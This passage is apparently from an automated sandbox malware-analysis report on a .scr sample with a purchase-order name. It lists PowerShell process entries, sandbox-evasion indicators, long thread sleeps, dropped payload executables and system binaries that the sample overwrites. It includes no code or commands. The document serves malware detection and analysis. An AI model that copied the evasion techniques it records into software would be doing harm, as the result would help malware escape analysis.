                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: armsvc.exe, 0000000B.00000003.513459460.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, SearchIndexer.exe.11.drBinary or memory string: FHTTPHTTPSFILEUNKNOWN%LS\%LSSOFTWARE\MICROSOFT\WINDOWS SEARCH\TRACING\EVENTTHROTTLELASTREPORTEDSOFTWARE\MICROSOFT\WINDOWS SEARCH\TRACINGEVENTTHROTTLEMAXEVENTSEVENTTHROTTLEMAXCONTROLPERIODMSEVENTTHROTTLEBLOCKPERIODMSEVENTTHROTTLEFLUSHPERIODMSMSFTE.DLLMSTRACER.DLL
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 200000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 2500000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 7FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 5C60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 8FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 9FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: A6F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: B6F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: C6F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 5D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 22D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 640000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 5AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 6AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 6BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 7BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 85B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 95B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: A5B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: B5B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2270000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 450000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 5400000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2D400000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 1C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 2690000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 340000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 2C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 22D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 5B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 28A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 2ED0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 29E0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3507Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1824Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2512Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3268Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeWindow / User API: threadDelayed 358
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 373
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1798
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2297
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2525
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1266
                  Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 401
                  Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 607
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 580
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrDropped PE file which has not been started: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\dllhost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr TID: 3272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep count: 2512 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep count: 3268 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr TID: 3696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\taskeng.exe TID: 3708Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe TID: 3776Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 4040Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 3812Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe TID: 3980Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\alg.exe TID: 3976Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4068Thread sleep count: 373 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1884Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 928Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4056Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2060Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992Thread sleep count: 2525 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992Thread sleep count: 1266 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2456Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1048Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\ehome\ehrecvr.exe TID: 3540Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\ehome\ehsched.exe TID: 3504Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\ieetwcollector.exe TID: 3920Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\msdtc.exe TID: 2720Thread sleep count: 401 > 30
                  Source: C:\Windows\System32\msdtc.exe TID: 2720Thread sleep time: -40100s >= -30000s
                  Source: C:\Windows\System32\msiexec.exe TID: 4076Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 2672Thread sleep count: 607 > 30
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 2672Thread sleep time: -6070000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 4032Thread sleep time: -34800000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 4032Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\vds.exe TID: 2576Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\wbengine.exe TID: 152Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe TID: 824Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe TID: 1404Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
